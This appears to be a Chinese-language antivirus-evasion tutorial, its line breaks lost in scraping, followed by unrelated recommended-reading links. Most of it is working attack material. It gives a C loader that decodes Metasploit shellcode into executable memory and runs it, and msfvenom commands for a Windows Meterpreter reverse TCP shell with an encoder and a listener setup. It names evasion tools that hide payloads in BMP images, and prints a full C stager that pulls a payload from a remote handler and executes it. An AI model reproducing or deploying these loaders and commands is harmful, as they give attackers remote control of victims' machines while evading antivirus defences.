base64.h代码
#ifndef _BASE64_H_#define _BASE64_H_#ifdef __cplusplusextern "C" {#endifint Base64encode_len(int len);int Base64encode(char * coded_dst, const char *plain_src, int len_plain_src);int Base64decode_len(const char * coded_src);int Base64decode(char * plain_dst, const char *coded_src);#ifdef __cplusplus}#endif#endif //_BASE64_H_shellcode.c#include <Windows.h>#include <stdio.h>#include <string.h>#include "base64.h"unsigned char buf[] ="msf base64 code here";int main(int argc, const char * argv[]) {char str1[1000] = { 0 };Base64decode(str1, buf);//printf("%d", sizeof(str3));char *Memory;Memory = VirtualAlloc(NULL, sizeof(str1), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);memcpy(Memory, str1, sizeof(str1));((void(*)())Memory)();return 0;}msf生成base64的shellcode
msfvenom -pwindows/meterpreter/reverse_tcp --encrypt base64lhost=10.211.55.2 lport=3333-f c > shell.cgcc编码
gcc shellcode.c base64.c -o test.exe③进行监听
use multi/handlerset payload windows/meterpreter/reverse_tcpset LHOST 10.211.55.2set LPORT 3333set EnableStageEncoding true
五、FourEye免杀kali环境下使用
直接使用即可
python3 BypassFramework.py加载器方法1.使用shellcode_launcher①生成raw格式的shellcode
msfvenom -pwindows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 6 -b 'x00' lhost=10.211.55.2 lport=3333-f raw -o shellcode.raw②
shellcode_launcher执行产生exe文件
shellcode_launcher.exe -i shellcode.raw#1
六、DKMC免杀[*] (gen)将msf的shellcode注入到一个BMP图像[*] (web)启动web服务用来分发BMP图像[*] (ps)生成ps的payload[*] (sc)将msf生成的raw文件转为shellcode[*] (exit)退出生成步骤与原理
先利用msf生成raw文件利用sc讲raw文件转换为shellcode利用gen将上一步的shellcode注入到一个BMP图像利用ps生成基于powershell的BMP文件的payload用web提供的简单web服务进行分发BMP文件https://mp.weixin.qq.com/s/UZqOBQKEMcXtF5ZU7E55Fg详细参考教程:https://www.freebuf.com/articles/system/227463.htmlhttps://uknowsec.cn/posts/notes/shellcode%E5%8A%A0%E8%BD%BD%E6%80%BB%E7%BB%93.html七、思维导图
文章插图
文章插图
文章插图
meta64位过杀软
过32位
/* * A C-based stager client compat with the Metasploit Framework *based on a discussion on the Metasploit Framework mailing list * * @作者 Raphael Mudge (raffi@strategiccyber.com) * @license BSD License. * * Relevant messages: * * http://mail.metasploit.com/pipermail/framework/2012-9月/008660.html * * http://mail.metasploit.com/pipermail/framework/2012-9月/008664.html */#include <stdio.h>#include <stdlib.h>#include <windows.h>#include <winsock2.h>/* init winsock */void winsock_init() {WSADATAwsaData;wordwVersionRequested;wVersionRequested = MAKEWORD(2, 2);if (WSAStartup(wVersionRequested, &wsaData) < 0) {printf("ws2_32.dll is out of date.n");WSACleanup();exit(1);}}/* a quick routine to quit and report why we quit */void punt(SOCKET my_socket, char * error) {printf("Bad things: %sn", error);closesocket(my_socket);WSACleanup();exit(1);}/* attempt to receive all of the requested data from the socket */int recv_all(SOCKET my_socket, void * buffer, int len) {inttret= 0;intnret= 0;void * startb = buffer;while (tret < len) {nret = recv(my_socket, (char *)startb, len - tret, 0);startb += nret;tret+= nret;if (nret == SOCKET_ERROR)punt(my_socket, "Could not receive data");}return tret;}/* establish a connection to a host:port */SOCKET wsconnect(char * targetip, int port) {struct hostent *target;struct sockaddr_insock;SOCKETmy_socket;/* setup our socket */my_socket = socket(AF_INET, SOCK_STREAM, 0);if (my_socket == INVALID_SOCKET)punt(my_socket, "Could not initialize socket");/* resolve our target */target = gethostbyname(targetip);if (target == NULL)punt(my_socket, "Could not resolve target");/* copy our target information into the sock */memcpy(&sock.sin_addr.s_addr, target->h_addr, target->h_length);sock.sin_family = AF_INET;sock.sin_port = htons(port);/* attempt to connect */if ( connect(my_socket, (struct sockaddr *)&sock, sizeof(sock)) )punt(my_socket, "Could not connect to target");return my_socket;}int main(int argc, char * argv[]) {ULONG32 size;char * buffer;void (*function)();winsock_init();if (argc != 3) {printf("%s [host] [port]n", argv[0]);exit(1);}/* connect to the handler */SOCKET my_socket = wsconnect(argv[1], atoi(argv[2]));/* read the 4-byte length */int count = recv(my_socket, (char *)&size, 4, 0);if (count != 4 || size <= 0)punt(my_socket, "read a strange or incomplete length valuen");/* allocate a RWX buffer */buffer = VirtualAlloc(0, size + 5, MEM_COMMIT, PAGE_EXECUTE_READWRITE);if (buffer == NULL)punt(my_socket, "could not allocate buffern");/* prepend a little assembly to move our SOCKET value to the EDI registerthanks mihi for pointing this outBF 78 56 34 12=>mov edi, 0x12345678 */buffer[0] = 0xBF;/* copy the value of our socket to the buffer */memcpy(buffer + 1, &my_socket, 4);/* read bytes into the buffer */count = recv_all(my_socket, buffer + 5, size);/* cast our buffer as a function and call it */function = (void (*)())buffer;function();return 0;}
推荐阅读
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
- 女人闭经危害大 了解闭经的4大诱因
- 卵巢早衰会引起经量减少 经量少的5个原因你应该了解!
- 怎么学习网络安全?这篇文带你从入门级开始学习网络安全
- Nginx 内存池似懂非懂?一文带你看清高性能服务器内存池
- 带你见识一下大厂google的服务器机房管理?
- 小程序开发之前,需要了解哪些费用
- Nginx,一看就会
- 长寿花几月停止修剪,长寿花怎么修剪
- 不仅限于Java 我们必须要了解的Java位运算
- SIP 协议详解
![[三言财经]华为手机国际市场有衰退,任正非首谈HMS:跟苹果谷歌比差距大](https://imgcdn.toutiaoyule.com/20200422/20200422155316263712a_t.jpeg)
